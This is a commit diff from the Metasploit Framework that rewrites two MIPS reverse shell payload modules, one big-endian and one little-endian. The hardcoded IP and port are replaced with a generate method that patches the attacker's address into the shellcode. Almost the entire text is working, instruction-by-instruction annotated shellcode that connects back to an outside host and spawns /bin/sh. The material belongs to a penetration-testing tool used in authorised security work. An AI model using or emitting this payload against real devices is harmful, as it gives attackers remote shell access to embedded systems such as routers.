Fixes #5581: Stop hardcoding MIPS reverse shell IP/port
git-svn-id: file:///home/svn/framework3/trunk@13999 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
4209431355
commit
ac916baac5
|
@ -35,41 +35,99 @@ module Metasploit3
|
|||
'Session' => Msf::Sessions::CommandShellUnix,
|
||||
'Payload' =>
|
||||
{
|
||||
'Offsets' =>
|
||||
{
|
||||
# FIXME: LHOST does'nt patch anything real, host is fixed to 192.168.1.9
|
||||
# Get shellcode with String.cpu=Metasm::MIPS.new
|
||||
# sc.decode
|
||||
# (but Metasploit's version is buggy)
|
||||
# We need to patch this: (C0A80109 = 192.168.1.9)
|
||||
# lui $t0, -3f58h ; @4ch 3c08c0a8
|
||||
# ori $a2, $t0, 109h ; @50h 35060109
|
||||
'LHOST' => [ 0x130, 'ADDR' ],
|
||||
'LPORT' => [ 0x5E, 'n' ],
|
||||
},
|
||||
'Payload' =>
|
||||
"\x24\x09\xff\xef\x05\x10\xff\xff\x28\x08\x82\x82\x01\x20\x48\x27" +
|
||||
"\x01\x3f\xc8\x21\xaf\xb9\x85\x48\x23\xb9\x85\x48\x3c\x1c\x00\x00" +
|
||||
"\x27\x9c\x00\x00\x03\x99\xe0\x21\x27\xbd\xff\xd0\xaf\xbc\x00\x00" +
|
||||
"\xaf\xbc\x00\x28\x8f\x84\x00\x00\x00\x00\x00\x00\x24\x84\x00\xf8" +
|
||||
"\x00\x00\x00\x00\x8c\x85\x00\x00\x8c\x87\x00\x04\x3c\x08\xc0\xa8" +
|
||||
"\x35\x06\x01\x09\x27\xb9\x00\x18\x24\x03\x00\x02\x24\x02\x12\x26" +
|
||||
"\xaf\xa5\x00\x18\xaf\xa6\x00\x0c\xaf\xa7\x00\x1c\xa7\xa3\x00\x08" +
|
||||
"\xa7\xa2\x00\x0a\xaf\xb9\x00\x20\xaf\xa0\x00\x24\x24\x04\x00\x02" +
|
||||
"\x24\x05\x00\x02\x00\x00\x30\x21\x24\x02\x10\x57\x00\x00\x00\x0c" +
|
||||
"\x24\x04\xff\xff\x10\x44\x00\x1a\x00\x40\x18\x21\x00\x60\x20\x21" +
|
||||
"\x24\x06\x00\x10\x27\xa5\x00\x08\x24\x02\x10\x4a\x00\x00\x00\x0c" +
|
||||
"\x14\x40\x00\x0e\x00\x00\x28\x21\x24\x02\x0f\xdf\x00\x00\x00\x0c" +
|
||||
"\x24\x05\x00\x01\x24\x02\x0f\xdf\x00\x00\x00\x0c\x24\x05\x00\x02" +
|
||||
"\x24\x02\x0f\xdf\x00\x00\x00\x0c\x03\x20\x20\x21\x27\xa5\x00\x20" +
|
||||
"\x00\x00\x30\x21\x24\x02\x0f\xab\x00\x00\x00\x0c\x00\x00\x20\x21" +
|
||||
"\x24\x02\x0f\xa1\x00\x00\x00\x0c\x03\xe0\x00\x08\x27\xbd\x00\x30" +
|
||||
"\x24\x04\x00\x01\x24\x02\x0f\xa1\x00\x00\x00\x0c\x10\x00\xff\xe4" +
|
||||
"\x00\x60\x20\x21\x2f\x62\x69\x6e\x2f\x73\x68\x00"+"0"*80
|
||||
'Offsets' => { },
|
||||
'Payload' => ''
|
||||
})
|
||||
)
|
||||
end
|
||||
|
||||
def generate
|
||||
if( !datastore['LHOST'] or datastore['LHOST'].empty? )
|
||||
return super
|
||||
end
|
||||
|
||||
host = Rex::Socket.addr_atoi(datastore['LHOST'])
|
||||
port = Integer(datastore['LPORT'])
|
||||
|
||||
host = [host].pack("N").unpack("cccc")
|
||||
port = [port].pack("n").unpack("cc")
|
||||
|
||||
shellcode =
|
||||
"\x24\x09\xff\xef" + # li t1,-17
|
||||
"\x05\x10\xff\xff" + # bltzal t0,0x4
|
||||
"\x28\x08\x82\x82" + # slti t0,zero,-32126
|
||||
"\x01\x20\x48\x27" + # nor t1,t1,zero
|
||||
"\x01\x3f\xc8\x21" + # addu t9,t1,ra
|
||||
"\xaf\xb9\x85\x48" + # sw t9,-31416(sp)
|
||||
"\x23\xb9\x85\x48" + # addi t9,sp,-31416
|
||||
"\x3c\x1c\x00\x00" + # lui gp,0x0
|
||||
"\x27\x9c\x00\x00" + # addiu gp,gp,0
|
||||
"\x03\x99\xe0\x21" + # addu gp,gp,t9
|
||||
"\x27\xbd\xff\xd0" + # addiu sp,sp,-48
|
||||
"\xaf\xbc\x00\x00" + # sw gp,0(sp)
|
||||
"\xaf\xbc\x00\x28" + # sw gp,40(sp)
|
||||
"\x8f\x84\x00\x00" + # lw a0,0(gp)
|
||||
"\x00\x00\x00\x00" + # nop
|
||||
"\x24\x84\x00\xf8" + # addiu a0,a0,248
|
||||
"\x00\x00\x00\x00" + # nop
|
||||
"\x8c\x85\x00\x00" + # lw a1,0(a0)
|
||||
"\x8c\x87\x00\x04" + # lw a3,4(a0)
|
||||
"\x3c\x08" + host[0..1].pack("C2") + # lui t0,0xc0a8
|
||||
"\x35\x06" + host[2..3].pack("C2") + # ori a2,t0,0x109
|
||||
"\x27\xb9\x00\x18" + # addiu t9,sp,24
|
||||
"\x24\x03\x00\x02" + # li v1,2
|
||||
"\x24\x02" + port.pack("C2") + # li v0,4646
|
||||
"\xaf\xa5\x00\x18" + # sw a1,24(sp)
|
||||
"\xaf\xa6\x00\x0c" + # sw a2,12(sp)
|
||||
"\xaf\xa7\x00\x1c" + # sw a3,28(sp)
|
||||
"\xa7\xa3\x00\x08" + # sh v1,8(sp)
|
||||
"\xa7\xa2\x00\x0a" + # sh v0,10(sp)
|
||||
"\xaf\xb9\x00\x20" + # sw t9,32(sp)
|
||||
"\xaf\xa0\x00\x24" + # sw zero,36(sp)
|
||||
"\x24\x04\x00\x02" + # li a0,2
|
||||
"\x24\x05\x00\x02" + # li a1,2
|
||||
"\x00\x00\x30\x21" + # move a2,zero
|
||||
"\x24\x02\x10\x57" + # li v0,4183
|
||||
"\x00\x00\x00\x0c" + # syscall
|
||||
"\x24\x04\xff\xff" + # li a0,-1
|
||||
"\x10\x44\x00\x1a" + # beq v0,a0,0x100
|
||||
"\x00\x40\x18\x21" + # move v1,v0
|
||||
"\x00\x60\x20\x21" + # move a0,v1
|
||||
"\x24\x06\x00\x10" + # li a2,16
|
||||
"\x27\xa5\x00\x08" + # addiu a1,sp,8
|
||||
"\x24\x02\x10\x4a" + # li v0,4170
|
||||
"\x00\x00\x00\x0c" + # syscall
|
||||
"\x14\x40\x00\x0e" + # bnez v0,0xec
|
||||
"\x00\x00\x28\x21" + # move a1,zero
|
||||
"\x24\x02\x0f\xdf" + # li v0,4063
|
||||
"\x00\x00\x00\x0c" + # syscall
|
||||
"\x24\x05\x00\x01" + # li a1,1
|
||||
"\x24\x02\x0f\xdf" + # li v0,4063
|
||||
"\x00\x00\x00\x0c" + # syscall
|
||||
"\x24\x05\x00\x02" + # li a1,2
|
||||
"\x24\x02\x0f\xdf" + # li v0,4063
|
||||
"\x00\x00\x00\x0c" + # syscall
|
||||
"\x03\x20\x20\x21" + # move a0,t9
|
||||
"\x27\xa5\x00\x20" + # addiu a1,sp,32
|
||||
"\x00\x00\x30\x21" + # move a2,zero
|
||||
"\x24\x02\x0f\xab" + # li v0,4011
|
||||
"\x00\x00\x00\x0c" + # syscall
|
||||
"\x00\x00\x20\x21" + # move a0,zero
|
||||
"\x24\x02\x0f\xa1" + # li v0,4001
|
||||
"\x00\x00\x00\x0c" + # syscall
|
||||
"\x03\xe0\x00\x08" + # jr ra
|
||||
"\x27\xbd\x00\x30" + # addiu sp,sp,48
|
||||
"\x24\x04\x00\x01" + # li a0,1
|
||||
"\x24\x02\x0f\xa1" + # li v0,4001
|
||||
"\x00\x00\x00\x0c" + # syscall
|
||||
"\x10\x00\xff\xe4" + # b 0xa0
|
||||
"\x00\x60\x20\x21" + # move a0,v1
|
||||
"\x2f\x62\x69\x6e" + # "/bin"
|
||||
"\x2f\x73\x68\x00" + # "/sh\x00"
|
||||
"0"*80
|
||||
# FIXME: remove extra 0 bytes!
|
||||
|
||||
}
|
||||
))
|
||||
return super + shellcode
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
@ -35,40 +35,92 @@ module Metasploit3
|
|||
'Session' => Msf::Sessions::CommandShellUnix,
|
||||
'Payload' =>
|
||||
{
|
||||
'Offsets' =>
|
||||
{
|
||||
# FIXME: LHOST does'nt patch anything real, host is fixed to 192.168.1.9
|
||||
# Get shellcode with String.cpu=Metasm::MIPS.new
|
||||
# sc.decode
|
||||
# (but Metasploit's version is buggy)
|
||||
# We need to patch this: (C0A80109 = 192.168.1.9)
|
||||
# lui $t0, -3f58h ; @4ch 3c08c0a8
|
||||
# ori $a2, $t0, 109h ; @50h 35060109
|
||||
'LHOST' => [ 0x130, 'ADDR' ],
|
||||
'LPORT' => [ 0x4C, 'n' ],
|
||||
},
|
||||
'Payload' =>
|
||||
"\xef\xff\x09\x24\xff\xff\x10\x05\x82\x82\x08\x28\x27\x48\x20\x01" +
|
||||
"\x21\xc8\x3f\x01\x48\x85\xb9\xaf\x48\x85\xb9\x23\x00\x00\x1c\x3c" +
|
||||
"\x00\x00\x9c\x27\x21\xe0\x99\x03\x00\x00\x89\x8f\xd8\xff\xbd\x27" +
|
||||
"\xe8\x00\x2a\x25\x04\x00\x47\x8d\xe8\x00\x28\x8d\x01\x09\x04\x3c" +
|
||||
"\xc0\xa8\x83\x34\x18\x00\xb9\x27\x02\x00\x06\x24\x12\x26\x05\x24" +
|
||||
"\x08\x00\xa6\xa7\x0a\x00\xa5\xa7\x18\x00\xa8\xaf\x1c\x00\xa7\xaf" +
|
||||
"\x0c\x00\xa3\xaf\x20\x00\xb9\xaf\x24\x00\xa0\xaf\x02\x00\x04\x24" +
|
||||
"\x02\x00\x05\x24\x21\x30\x00\x00\x57\x10\x02\x24\x0c\x00\x00\x00" +
|
||||
"\x21\x18\x40\x00\xff\xff\x02\x24\x1a\x00\x62\x10\x01\x00\x04\x24" +
|
||||
"\x21\x20\x60\x00\x08\x00\xa5\x27\x10\x00\x06\x24\x4a\x10\x02\x24" +
|
||||
"\x0c\x00\x00\x00\x0e\x00\x40\x14\x21\x28\x00\x00\xdf\x0f\x02\x24" +
|
||||
"\x0c\x00\x00\x00\x01\x00\x05\x24\xdf\x0f\x02\x24\x0c\x00\x00\x00" +
|
||||
"\x02\x00\x05\x24\xdf\x0f\x02\x24\x0c\x00\x00\x00\x21\x30\x00\x00" +
|
||||
"\x21\x20\x20\x03\x20\x00\xa5\x27\xab\x0f\x02\x24\x0c\x00\x00\x00" +
|
||||
"\x21\x20\x00\x00\xa1\x0f\x02\x24\x0c\x00\x00\x00\x08\x00\xe0\x03" +
|
||||
"\x28\x00\xbd\x27\xa1\x0f\x02\x24\x0c\x00\x00\x00\xe5\xff\x00\x10" +
|
||||
"\x21\x20\x60\x00\x2f\x62\x69\x6e\x2f\x73\x68\x00"+"0"*80
|
||||
# FIXME: remove extra 0 bytes!
|
||||
'Offsets' => { },
|
||||
'Payload' => ''
|
||||
})
|
||||
)
|
||||
end
|
||||
|
||||
}
|
||||
))
|
||||
def generate
|
||||
if( !datastore['LHOST'] or datastore['LHOST'].empty? )
|
||||
return super
|
||||
end
|
||||
|
||||
host = Rex::Socket.addr_atoi(datastore['LHOST'])
|
||||
port = Integer(datastore['LPORT'])
|
||||
|
||||
host = [host].pack("N").unpack("cccc")
|
||||
port = [port].pack("n").unpack("cc")
|
||||
|
||||
shellcode =
|
||||
"\xef\xff\x09\x24" + # li t1,-17
|
||||
"\xff\xff\x10\x05" + # bltzal t0,0x4
|
||||
"\x82\x82\x08\x28" + # slti t0,zero,-32126
|
||||
"\x27\x48\x20\x01" + # nor t1,t1,zero
|
||||
"\x21\xc8\x3f\x01" + # addu t9,t1,ra
|
||||
"\x48\x85\xb9\xaf" + # sw t9,-31416(sp)
|
||||
"\x48\x85\xb9\x23" + # addi t9,sp,-31416
|
||||
"\x00\x00\x1c\x3c" + # lui gp,0x0
|
||||
"\x00\x00\x9c\x27" + # addiu gp,gp,0
|
||||
"\x21\xe0\x99\x03" + # addu gp,gp,t9
|
||||
"\x00\x00\x89\x8f" + # lw t1,0(gp)
|
||||
"\xd8\xff\xbd\x27" + # addiu sp,sp,-40
|
||||
"\xe8\x00\x2a\x25" + # addiu t2,t1,232
|
||||
"\x04\x00\x47\x8d" + # lw a3,4(t2)
|
||||
"\xe8\x00\x28\x8d" + # lw t0,232(t1)
|
||||
host[2..3].pack("C2") + "\x04\x3c" + # lui a0,0x901
|
||||
host[0..1].pack("C2") + "\x83\x34" + # ori v1,a0,0xa8c0
|
||||
"\x18\x00\xb9\x27" + # addiu t9,sp,24
|
||||
"\x02\x00\x06\x24" + # li a2,2
|
||||
port.pack("C2") + "\x05\x24" + # li a1,9746
|
||||
"\x08\x00\xa6\xa7" + # sh a2,8(sp)
|
||||
"\x0a\x00\xa5\xa7" + # sh a1,10(sp)
|
||||
"\x18\x00\xa8\xaf" + # sw t0,24(sp)
|
||||
"\x1c\x00\xa7\xaf" + # sw a3,28(sp)
|
||||
"\x0c\x00\xa3\xaf" + # sw v1,12(sp)
|
||||
"\x20\x00\xb9\xaf" + # sw t9,32(sp)
|
||||
"\x24\x00\xa0\xaf" + # sw zero,36(sp)
|
||||
"\x02\x00\x04\x24" + # li a0,2
|
||||
"\x02\x00\x05\x24" + # li a1,2
|
||||
"\x21\x30\x00\x00" + # move a2,zero
|
||||
"\x57\x10\x02\x24" + # li v0,4183
|
||||
"\x0c\x00\x00\x00" + # syscall
|
||||
"\x21\x18\x40\x00" + # move v1,v0
|
||||
"\xff\xff\x02\x24" + # li v0,-1
|
||||
"\x1a\x00\x62\x10" + # beq v1,v0,0xf4
|
||||
"\x01\x00\x04\x24" + # li a0,1
|
||||
"\x21\x20\x60\x00" + # move a0,v1
|
||||
"\x08\x00\xa5\x27" + # addiu a1,sp,8
|
||||
"\x10\x00\x06\x24" + # li a2,16
|
||||
"\x4a\x10\x02\x24" + # li v0,4170
|
||||
"\x0c\x00\x00\x00" + # syscall
|
||||
"\x0e\x00\x40\x14" + # bnez v0,0xe0
|
||||
"\x21\x28\x00\x00" + # move a1,zero
|
||||
"\xdf\x0f\x02\x24" + # li v0,4063
|
||||
"\x0c\x00\x00\x00" + # syscall
|
||||
"\x01\x00\x05\x24" + # li a1,1
|
||||
"\xdf\x0f\x02\x24" + # li v0,4063
|
||||
"\x0c\x00\x00\x00" + # syscall
|
||||
"\x02\x00\x05\x24" + # li a1,2
|
||||
"\xdf\x0f\x02\x24" + # li v0,4063
|
||||
"\x0c\x00\x00\x00" + # syscall
|
||||
"\x21\x30\x00\x00" + # move a2,zero
|
||||
"\x21\x20\x20\x03" + # move a0,t9
|
||||
"\x20\x00\xa5\x27" + # addiu a1,sp,32
|
||||
"\xab\x0f\x02\x24" + # li v0,4011
|
||||
"\x0c\x00\x00\x00" + # syscall
|
||||
"\x21\x20\x00\x00" + # move a0,zero
|
||||
"\xa1\x0f\x02\x24" + # li v0,4001
|
||||
"\x0c\x00\x00\x00" + # syscall
|
||||
"\x08\x00\xe0\x03" + # jr ra
|
||||
"\x28\x00\xbd\x27" + # addiu sp,sp,40
|
||||
"\xa1\x0f\x02\x24" + # li v0,4001
|
||||
"\x0c\x00\x00\x00" + # syscall
|
||||
"\xe5\xff\x00\x10" + # b 0x94
|
||||
"\x21\x20\x60\x00" + # move a0,v1
|
||||
"\x2f\x62\x69\x6e" + # "/bin"
|
||||
"\x2f\x73\x68\x00" + # "/sh\x00"
|
||||
"0"*80
|
||||
end
|
||||
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue